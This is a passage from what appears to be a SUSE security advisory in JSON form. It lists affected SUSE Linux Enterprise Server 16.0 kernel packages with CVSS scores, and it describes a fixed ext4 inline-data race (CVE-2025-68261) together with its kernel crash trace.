"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
